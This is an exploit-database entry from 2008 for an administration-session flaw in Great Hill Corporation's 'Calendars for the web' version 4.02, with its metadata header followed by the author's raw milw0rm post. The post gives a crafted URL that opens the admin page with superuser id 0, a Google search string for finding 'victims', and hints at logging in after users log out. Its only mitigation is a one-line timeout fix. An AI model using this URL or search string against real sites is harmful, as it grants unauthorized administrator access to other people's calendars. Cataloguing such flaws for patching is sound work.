Calendars for the web by great hill corporation

vendor:

Calendars for the web

by:

SecVuln

3.3

CVSS

MEDIUM

Session Management Vulnerability

287

CWE

Product Name: Calendars for the web

Affected Version From: 04.02

Affected Version To: 04.02

Patch Exists: NO

Related CWE: N/A

CPE: a:great_hill_corporation:calendars_for_the_web

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Calendars for the web by great hill corporation

Calendars for the web has a vulnerability in the administration page. The page saves the past session, so that anyone navigating to the page has admin access. Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe After attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0 A Google query can find a couple pages of victims: inurl:calweb/calweb.exe Further hacks: if they disable the timeout you can still log in right after they log out... You could probaly do something with that Also the 0 at the ending is the administrator (super user) id.

Mitigation:

Set time out for login to five minutes

Source

Exploit-DB raw data:

*******************************************************
*Exploit discovered by SecVuln from http://secvuln.com*
*Come join our clan!                                  *
*contact secvuln@secvuln.com                          *
*******************************************************

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Author == SecVuln
Version == 4.02
Software == Calendars for the web by great hill corporation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Calendars for the web has a vulnerability in the administration page.
The page saves the past session, so that anyone navigating to the page has
admin access.

Exploit:

Before attack: target.com/calendarWeb/cgi-bin/calweb/calweb.exe

After attack:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0

Example:
target.com/calendarWeb/cgi-bin/calweb/calweb.exe?cal=default&vt=6&cmd=900&act=0&dd=2008;10;03;12;00;00;&app=0&format=21x05i9r9s|SnriTmOdoaT&lastcmd=0

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
how to fix: set time out for login to five minutes    !
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

A Google query can find a couple pages of victims:  inurl:calweb/calweb.exe

Further hacks: if they disable the timeout you can still log in right after
they log out... You could probaly do something with that
Also the 0 at the ending is the administrator (super user) id.

/////////////////////////////////////////////////////////////////
I take no responsability for the misuse of the information.//////
Author will not be held liable for any damages             //////
COME CHECK MY SITE OUT WWW.SECVULN.COM                     //////
////////////////////////////////////////////////////////////////

# milw0rm.com [2008-10-16]